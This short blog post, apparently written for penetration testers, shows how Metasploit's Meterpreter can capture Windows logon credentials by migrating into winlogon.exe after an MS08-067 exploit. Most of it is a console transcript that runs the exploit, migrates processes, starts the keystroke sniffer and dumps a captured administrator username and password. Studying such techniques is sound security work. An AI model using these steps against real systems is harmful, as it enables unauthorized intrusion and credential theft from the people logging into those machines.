In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user's keystrokes.
While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop, however when I tried to sniff the active user's keystrokes this way, it was not successful. Although Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can capture the username and password of anyone logging into the target's console. The example below demonstrates this process:
msf exploit(ms08_067_netapi) > exploit [*] Triggering the vulnerability... [*] Sending stage (2650 bytes) [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened meterpreter > ps Process list ============ PID Name Path --- ---- ---- 292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe 316 Explorer.EXE C:\WINDOWS\Explorer.EXE 356 smss.exe \SystemRoot\System32\smss.exe 416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe 440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe [ snip ] meterpreter > migrate 440 [*] Migrating to 440... [*] Migration completed successfully. meterpreter > keyscan_start Starting the keystroke sniffer... [ wait for user login ] meterpreter > keyscan_dump Dumping captured keystrokes... Administrator <Tab> s3cretp4ss <Return>